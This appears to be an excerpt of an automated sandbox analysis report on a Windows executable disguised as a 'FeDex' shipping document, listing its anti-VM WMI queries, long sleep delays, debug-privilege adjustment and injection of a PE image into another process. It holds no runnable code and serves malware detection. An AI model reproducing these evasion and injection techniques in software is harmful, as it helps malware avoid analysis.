        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5296Thread sleep time: -40023s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5588Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5852Thread sleep count: 9470 > 30Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -13835058055282155s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1200000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199750s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199609s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199484s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199356s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199203s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199062s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198943s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198797s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198641s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198495s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198340s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198199s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197797s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197594s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197453s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197296s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197146s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197017s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196889s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196770s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196650s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196530s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196426s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196299s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196145s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196018s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195896s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195760s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195640s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195535s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195348s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195192s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195005s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194848s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194692s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194557s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194442s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194302s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194182s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194066s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193928s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193798s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193634s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193517s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193401s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193286s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193145s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193005s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1200000Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199750Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199609Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199484Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199356Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199203Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199062Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198943Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198797Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198641Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198495Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198340Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198199Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197797Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197594Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197453Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197296Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197146Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197017Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196889Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196770Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196650Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196530Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196426Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196299Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196145Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196018Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195896Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195760Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195640Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195535Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195348Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195192Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195005Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194848Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194692Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194557Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194442Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194302Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194182Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194066Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193928Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193798Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193634Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193517Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193401Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193286Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193145Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193005Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWindow / User API: threadDelayed 9470Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 40023Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1200000Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199750Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199609Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199484Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199356Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199203Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199062Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198943Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198797Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198641Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198495Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198340Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198199Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197797Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197594Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197453Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197296Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197146Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197017Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196889Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196770Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196650Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196530Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196426Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196299Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196145Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196018Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195896Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195760Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195640Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195535Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195348Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195192Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195005Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194848Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194692Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194557Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194442Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194302Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194182Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194066Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193928Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193798Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193634Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193517Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193401Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193286Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193145Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193005Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeMemory written: C:\Users\user\Desktop\FeDex_shipping_document.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exeJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Users\user\Desktop\FeDex_shipping_document.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
